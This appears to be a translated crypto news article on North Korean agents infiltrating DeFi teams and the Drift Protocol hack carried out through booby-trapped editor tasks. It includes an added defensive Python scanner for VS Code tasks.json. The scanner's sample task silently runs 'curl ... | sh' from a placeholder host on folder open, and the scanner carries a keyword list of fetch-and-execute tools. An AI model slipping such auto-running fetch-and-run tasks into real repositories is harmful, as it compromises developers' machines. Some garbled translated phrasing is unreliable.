Agents linked to North Korea have spent years quietly embedding themselves within crypto companies and DeFi projects.
A long-running crypto-infiltration saga
News and reports coming out of the Democratic People’s Republic of Korea tend to have a distinct conspiracy theory and action movie feel. However, they also tend to be true and not exaggerated at all.
This time, security researcher and MetaMask developer Taylor Monahan said in a post on social network
Yeahpppppp
Many DPRK computer scientists have been building the protocols you know and love since the Summer Challenge.
The “7 years of experience in blockchain development” on their CV is not a lie.
–Tay 💖 (@tayvano_) April 5, 2026
She claims that North Korean computer scientists have quietly worked on more than 40 DeFi projects over about seven years, including protocols that became known after the DeFi summer.
oh my god uhhhh like sushi, thorchain, yam, pickle, harvest, recover, swing, paid, naos, shezmu, qrolli, saffron, sifu, napier, harmony, blueberry, stabble, onering, elemental, divvy, la token, impermax, kira, cook, fantom, ankr, gamerse, metaplay, spice, beanstalk, deltaprime,…
–Tay 💖 (@tayvano_) April 5, 2026
These workers often have “real” on-chain experience (seven years of blockchain development) but operate under stolen or synthetic identities, connecting to teams through normal recruiting funnels.
Her posts were a reply to Tim, a pseudonymous builder and the public face of Titan, a DEX aggregation and routing project based on Solana, who said that at a previous job they interviewed an extremely qualified candidate who turned out to be an agent of Lazarus, the North Korea-affiliated group that has funneled billions of dollars of stolen money through cryptocurrency networks.
In a previous job, we interviewed someone who turned out to be an agent of Lazarus. he made video calls and was extremely skilled
we invited him for in-person interviews and he ultimately refused to fly, so we were successful
only later did we find his name in a Lazarus info dump…
—Tim | Titan (@timahhl) April 5, 2026
Famous crypto detective ZachXBT also responded to Tim’s post, explaining that it was not just “Lazarus”, but a network of DPRK units (Lazarus, APT38, AppleJeus, etc.) coordinated by the General Reconnaissance Bureau and optimized for financial cybercrime. Their methods rely on “basic and hard” outreach via LinkedIn, job boards, interviews, Zoom, as well as remote development roles that teams still grant far too easily.
Lazarus Group is the collective name for all state-sponsored cyber actors in the DPRK.
The main problem is that everyone lumps them together when the complexity of the threats is different.
Threats via job postings, LinkedIn, emails, Zoom or interviews are basic and under no circumstances… pic.twitter.com/NL8Jck5edN
-ZachXBT (@zachxbt) April 5, 2026
Recent sanctions from the US Treasury Department’s Office of Foreign Assets Control (OFAC) and findings from Chainalysis indicate that the DPRK’s computer networks generated $800 million in 2024 alone and have moved billions in stolen crypto since 2017, fueling weapons of mass destruction (WMD) and missile programs.
New information about the crypto hack on Drift Protocol
The April 1 attack on the $285 million Drift Protocol reignited fears about insider threats from North Korea, particularly after the protocol itself confirmed Saturday that speculation linking the attack to North Korean hacking groups was true.
– Drift (@DriftProtocol) April 5, 2026
They attributed the attack “with medium confidence” to UNC4736, a North Korea-aligned and state-sponsored hacking group.
The protocol claimed that the attackers relied on a well-crafted social engineering strategy: fake professional personas, in-person conference interactions, and booby-trapped developer tools to compromise contributors before ultimately executing the exploit. The attackers posed as a legitimate business, met Drift contributors in person in multiple countries, and used entirely constructed identities with professional backgrounds and professional networks before triggering the exploit.
The attackers abused common development tools, inserting malicious tasks into VS Code and Cursor configurations and supplying a compromised repository that contributors ran locally without realizing it. Taken together, these elements make the incident look much more like an insider-style supply chain compromise than a simple smart contract exploit.
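A reviewer can inspect a repository's editor task file before opening the folder as trusted. The following is an added example, not code from Drift or from the article: it assumes the tasks live in a workspace `.vscode/tasks.json` and flags tasks that auto-run on folder open, hide their terminal, or fetch and evaluate code. The article does not say which task properties were used, so these three checks and the `RISKY` list are assumptions.

```python
import json
import re

STRING = r'"(?:\\.|[^"\\])*"'
# Command fragments worth a second look; an illustrative list, not known indicators.
RISKY = re.compile(r"\b(curl|wget|powershell|base64|bash -c|node -e|python3? -c)", re.I)

def _drop(pattern, text):
    # Delete matches of `pattern` while leaving JSON string literals untouched.
    rx = re.compile(STRING + "|" + pattern, re.S)
    return rx.sub(lambda m: m.group(0) if m.group(0)[0] == '"' else "", text)

def load_jsonc(text):
    """tasks.json allows comments and trailing commas; strip both, then parse."""
    text = _drop(r"//[^\n]*|/\*.*?\*/", text)
    return json.loads(_drop(r",(?=\s*[}\]])", text))

def _command_line(block):
    # `command` and each arg may be a string or a {"value": ...} object.
    parts = [block.get("command", "")] + list(block.get("args", []))
    return " ".join(str(p.get("value", "")) if isinstance(p, dict) else str(p) for p in parts).strip()

def audit_tasks(text):
    """Return [(label, reasons, commands)] for tasks to review before trusting the folder."""
    findings = []
    for task in load_jsonc(text).get("tasks", []):
        # Per-OS blocks can override the top-level command, so inspect all of them.
        blocks = [task] + [task[k] for k in ("windows", "osx", "linux") if isinstance(task.get(k), dict)]
        commands = [c for c in map(_command_line, blocks) if c]
        reasons = []
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            reasons.append("runs automatically when the folder is opened")
        if task.get("presentation", {}).get("reveal") in ("never", "silent"):
            reasons.append("terminal output is hidden")
        if any(RISKY.search(c) for c in commands):
            reasons.append("command fetches or evaluates code")
        if reasons:
            findings.append((task.get("label", "<unlabelled>"), reasons, commands))
    return findings

# Constructed sample: an ordinary build task beside one showing all three traits.
SAMPLE = r'''{ /* constructed for this example */ "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm", "args": ["run", "build"]},
    {"label": "prepare env", "type": "shell", "command": "echo ok",
     "osx": {"command": "curl -s https://example.invalid/setup | sh"},
     "runOptions": {"runOn": "folderOpen"}, "presentation": {"reveal": "never"},},
  ]
}'''
```

Run `audit_tasks` on the file's text from a plain terminal or a restricted-mode window, so that nothing in the repository executes during the review.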
The day after the attack, Ledger CTO Charles Guillemet linked the attack method to the $1.4 billion Bybit hack attributed to the regime’s cyber units. Then, on Friday, blockchain analytics firm Elliptic released a survey claiming that on-chain behavior, laundering methods, and network-level indicators match techniques seen in previous DPRK-related operations. Bitcoinist covered the story.
Market implications
This crypto hacking saga has transformed into a structural national security risk. Regulators and sanctions agencies are already getting stricter around the DPRK’s computer networks, and more aggressive enforcement will likely follow.
Large state-linked exploits create latent protocol risk: higher insurance premiums, potential delistings, governance infighting over restitution, and longer risk aversion periods for DeFi tokens and perp volumes.

At the time of writing, BTC trades in the high $69k range on the daily chart. Source: BTCUSDT on Tradingview.
Cover image from Perplexity. BTCUSDT chart from Tradingview.

